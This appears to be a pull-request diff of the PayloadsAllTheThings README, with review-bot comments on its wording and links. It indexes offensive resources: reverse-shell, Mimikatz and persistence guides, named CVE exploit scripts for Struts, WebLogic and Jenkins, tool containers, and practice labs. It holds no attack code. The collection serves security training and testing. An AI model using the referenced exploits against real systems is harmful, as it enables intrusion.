I <3 pull requests :) I :heart: pull requests :)
You can also contribute with a beer IRL or with `buymeacoffee.com` You can also contribute with a :beers: IRL or with `buymeacoffee.com`
[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky) [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
Every section contains: Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
- README.md - vulnerability description and how to exploit it - README.md - vulnerability description and how to exploit it
- Intruders - a set of files to give to Burp Intruder - Intruder - a set of files to give to Burp Intruder
- Some exploits - Images - pictures for the README.md
- Files - some files referenced in the README.md
You might also like : You might also like the `Methodology and Resources` folder :
- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/) - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
- [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md) - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
- [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md) - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)
- [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md)
- [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md) - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md) - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
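Review bot: "Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter" is a comma splice; split it ("... the following files. Use the `_template_vuln` folder to create a new chapter."). Renaming `Methodology_and_enumeration.md` to `Methodology and enumeration.md` breaks every external link to the old path; keep a stub at the old name or mention the rename in the release notes. The list now mixes singular and plural ("Intruder", "Images", "Files"); the folder names should be checked against the repository so the README matches what is on disk.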
@@ -26,99 +30,26 @@ You might also like :
- [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md) - [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
- [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md) - [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
- [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md) - [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
- [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md) - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
- Apache Struts 2 CVE-2017-5638.py - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
- Apache Struts 2 CVE-2017-9805.py - Apache Struts 2 CVE-2017-5638.py
- Drupalgeddon2 CVE-2018-7600.rb - Apache Struts 2 CVE-2017-9805.py
- Heartbleed CVE-2014-0160.py - Apache Struts 2 CVE-2018-11776.py
- Shellshock CVE-2014-6271.py - Docker API RCE.py
- Tomcat CVE-2017-12617.py - Drupalgeddon2 CVE-2018-7600.rb
- Heartbleed CVE-2014-0160.py
- JBoss CVE-2015-7501.py
- Jenkins CVE-2015-8103.py
- Jenkins CVE-2016-0792.py
- Shellshock CVE-2014-6271.py
- Tomcat CVE-2017-12617.py
- WebLogic CVE-2016-3510.py
- WebLogic CVE-2017-10271.py
- WebLogic CVE-2018-2894.py
- WebSphere CVE-2015-7450.py
## Try Harder You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections.
Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
- __Bug Bounty Platforms__
- [HackerOne](https://hackerone.com)
- [BugCrowd](https://bugcrowd.com)
- [Bounty Factory](https://bountyfactory.io)
- [Synack](https://www.synack.com/)
- [Intigriti](https://www.intigriti.com)
- [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
- __Online Platforms__
- [Hack The Box](hackthebox.eu/)
- [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
- [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
- [Zenk-Security](https://www.zenk-security.com/epreuves.php)
- [Root-Me](https://www.root-me.org)
- [W3Challs](https://w3challs.com/)
- [NewbieContest](https://www.newbiecontest.org/)
- [Vulnhub](https://www.vulnhub.com/)
- [The Cryptopals Crypto Challenges](https://cryptopals.com/)
- [alert(1) to win](https://alf.nu/alert1)
- [Hacksplaining](https://www.hacksplaining.com/exercises)
- [HackThisSite](https://hackthissite.org)
- [Hackers.gg](hackers.gg)
- [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
## Book's list
Grab a book and relax, these ones are the best security books (in my opinion).
- [Web Hacking 101](https://leanpub.com/web-hacking-101)
- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
- [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
- [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
- [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
- [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
- [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
- [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
- [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
- [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
- [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
- [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
- [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
- [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
- [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
## More resources
### Blogs/Websites
- [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
- [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
- [Tips from Top Hackers Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
- [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
- [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
- [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
### Youtube
- [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
- [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
- [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
- [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
### Docker
| Command | Link |
| :------------- | :------------- |
| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
| `docker pull paoloo/sqlmap` | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/) |
| `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) |
| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
| `docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite` | [Damn Vulnerable NodeJS Application](https://github.com/appsecco/dvna) |
| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
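Review bot: the renamed exploit entry `Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py` carries a stray underscore before `.py`, unlike its siblings `Apache Struts 2 CVE-2017-9805.py` and `Apache Struts 2 CVE-2018-11776.py`; drop it or say why the suffix is there. `Docker API RCE.py` is the only entry in the CVE Exploits list without a CVE identifier, so a short qualifier (or an advisory reference) would keep the list self-describing. The sections this hunk drops from the README (Try Harder, Book's list, More resources, Docker) still contain scheme-less links, `[Hack The Box](hackthebox.eu/)` and `[Hackers.gg](hackers.gg)`, which render as relative paths; add `https://` to both wherever that content lands.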